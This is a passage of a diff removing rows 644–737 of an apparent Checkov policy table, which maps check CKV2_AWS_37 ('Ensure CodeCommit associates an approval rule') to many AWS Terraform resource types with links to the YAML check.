-|  644 | CKV2_AWS_37     | resource | aws_cloudfront_public_key                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  645 | CKV2_AWS_37     | resource | aws_cloudhsm_v2_cluster                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  646 | CKV2_AWS_37     | resource | aws_cloudhsm_v2_hsm                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  647 | CKV2_AWS_37     | resource | aws_cloudtrail                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  648 | CKV2_AWS_37     | resource | aws_cloudwatch_dashboard                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  649 | CKV2_AWS_37     | resource | aws_cloudwatch_event_permission                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  650 | CKV2_AWS_37     | resource | aws_cloudwatch_event_rule                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  651 | CKV2_AWS_37     | resource | aws_cloudwatch_event_target                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  652 | CKV2_AWS_37     | resource | aws_cloudwatch_log_destination                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  653 | CKV2_AWS_37     | resource | aws_cloudwatch_log_destination_policy                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  654 | CKV2_AWS_37     | resource | aws_cloudwatch_log_group                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  655 | CKV2_AWS_37     | resource | aws_cloudwatch_log_metric_filter                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  656 | CKV2_AWS_37     | resource | aws_cloudwatch_log_resource_policy                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  657 | CKV2_AWS_37     | resource | aws_cloudwatch_log_stream                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  658 | CKV2_AWS_37     | resource | aws_cloudwatch_log_subscription_filter                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  659 | CKV2_AWS_37     | resource | aws_cloudwatch_metric_alarm                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  660 | CKV2_AWS_37     | resource | aws_codebuild_project                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  661 | CKV2_AWS_37     | resource | aws_codebuild_source_credential                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  662 | CKV2_AWS_37     | resource | aws_codebuild_webhook                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  663 | CKV2_AWS_37     | resource | aws_codecommit_repository                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  664 | CKV2_AWS_37     | resource | aws_codecommit_trigger                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  665 | CKV2_AWS_37     | resource | aws_codedeploy_app                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  666 | CKV2_AWS_37     | resource | aws_codedeploy_deployment_config                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  667 | CKV2_AWS_37     | resource | aws_codedeploy_deployment_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  668 | CKV2_AWS_37     | resource | aws_codepipeline                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  669 | CKV2_AWS_37     | resource | aws_codepipeline_webhook                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  670 | CKV2_AWS_37     | resource | aws_codestarnotifications_notification_rule             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  671 | CKV2_AWS_37     | resource | aws_cognito_identity_pool                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  672 | CKV2_AWS_37     | resource | aws_cognito_identity_pool_roles_attachment              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  673 | CKV2_AWS_37     | resource | aws_cognito_identity_provider                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  674 | CKV2_AWS_37     | resource | aws_cognito_resource_server                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  675 | CKV2_AWS_37     | resource | aws_cognito_user_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  676 | CKV2_AWS_37     | resource | aws_cognito_user_pool                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  677 | CKV2_AWS_37     | resource | aws_cognito_user_pool_client                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  678 | CKV2_AWS_37     | resource | aws_cognito_user_pool_domain                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  679 | CKV2_AWS_37     | resource | aws_config_aggregate_authorization                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  680 | CKV2_AWS_37     | resource | aws_config_config_rule                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  681 | CKV2_AWS_37     | resource | aws_config_configuration_aggregator                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  682 | CKV2_AWS_37     | resource | aws_config_configuration_recorder                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  683 | CKV2_AWS_37     | resource | aws_config_configuration_recorder_status                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  684 | CKV2_AWS_37     | resource | aws_config_delivery_channel                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  685 | CKV2_AWS_37     | resource | aws_config_organization_custom_rule                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  686 | CKV2_AWS_37     | resource | aws_config_organization_managed_rule                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  687 | CKV2_AWS_37     | resource | aws_cur_report_definition                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  688 | CKV2_AWS_37     | resource | aws_customer_gateway                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  689 | CKV2_AWS_37     | resource | aws_datapipeline_pipeline                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  690 | CKV2_AWS_37     | resource | aws_datasync_agent                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  691 | CKV2_AWS_37     | resource | aws_datasync_location_efs                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  692 | CKV2_AWS_37     | resource | aws_datasync_location_nfs                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  693 | CKV2_AWS_37     | resource | aws_datasync_location_s3                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  694 | CKV2_AWS_37     | resource | aws_datasync_location_smb                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  695 | CKV2_AWS_37     | resource | aws_datasync_task                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  696 | CKV2_AWS_37     | resource | aws_dax_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  697 | CKV2_AWS_37     | resource | aws_dax_parameter_group                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  698 | CKV2_AWS_37     | resource | aws_dax_subnet_group                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  699 | CKV2_AWS_37     | resource | aws_db_cluster_snapshot                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  700 | CKV2_AWS_37     | resource | aws_db_event_subscription                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  701 | CKV2_AWS_37     | resource | aws_db_instance                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  702 | CKV2_AWS_37     | resource | aws_db_instance_role_association                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  703 | CKV2_AWS_37     | resource | aws_db_option_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  704 | CKV2_AWS_37     | resource | aws_db_parameter_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  705 | CKV2_AWS_37     | resource | aws_db_security_group                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  706 | CKV2_AWS_37     | resource | aws_db_snapshot                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  707 | CKV2_AWS_37     | resource | aws_db_subnet_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  708 | CKV2_AWS_37     | resource | aws_default_network_acl                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  709 | CKV2_AWS_37     | resource | aws_default_route_table                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  710 | CKV2_AWS_37     | resource | aws_default_security_group                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  711 | CKV2_AWS_37     | resource | aws_default_subnet                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  712 | CKV2_AWS_37     | resource | aws_default_vpc                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  713 | CKV2_AWS_37     | resource | aws_default_vpc_dhcp_options                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  714 | CKV2_AWS_37     | resource | aws_devicefarm_project                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  715 | CKV2_AWS_37     | resource | aws_directory_service_conditional_forwarder             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  716 | CKV2_AWS_37     | resource | aws_directory_service_directory                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  717 | CKV2_AWS_37     | resource | aws_directory_service_log_subscription                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  718 | CKV2_AWS_37     | resource | aws_dlm_lifecycle_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  719 | CKV2_AWS_37     | resource | aws_dms_certificate                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  720 | CKV2_AWS_37     | resource | aws_dms_endpoint                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  721 | CKV2_AWS_37     | resource | aws_dms_event_subscription                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  722 | CKV2_AWS_37     | resource | aws_dms_replication_instance                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  723 | CKV2_AWS_37     | resource | aws_dms_replication_subnet_group                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  724 | CKV2_AWS_37     | resource | aws_dms_replication_task                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  725 | CKV2_AWS_37     | resource | aws_docdb_cluster                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  726 | CKV2_AWS_37     | resource | aws_docdb_cluster_instance                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  727 | CKV2_AWS_37     | resource | aws_docdb_cluster_parameter_group                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  728 | CKV2_AWS_37     | resource | aws_docdb_cluster_snapshot                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  729 | CKV2_AWS_37     | resource | aws_docdb_subnet_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  730 | CKV2_AWS_37     | resource | aws_dx_bgp_peer                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  731 | CKV2_AWS_37     | resource | aws_dx_connection                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  732 | CKV2_AWS_37     | resource | aws_dx_connection_association                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  733 | CKV2_AWS_37     | resource | aws_dx_gateway                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  734 | CKV2_AWS_37     | resource | aws_dx_gateway_association                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  735 | CKV2_AWS_37     | resource | aws_dx_gateway_association_proposal                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  736 | CKV2_AWS_37     | resource | aws_dx_hosted_private_virtual_interface                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  737 | CKV2_AWS_37     | resource | aws_dx_hosted_private_virtual_interface_accepter        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
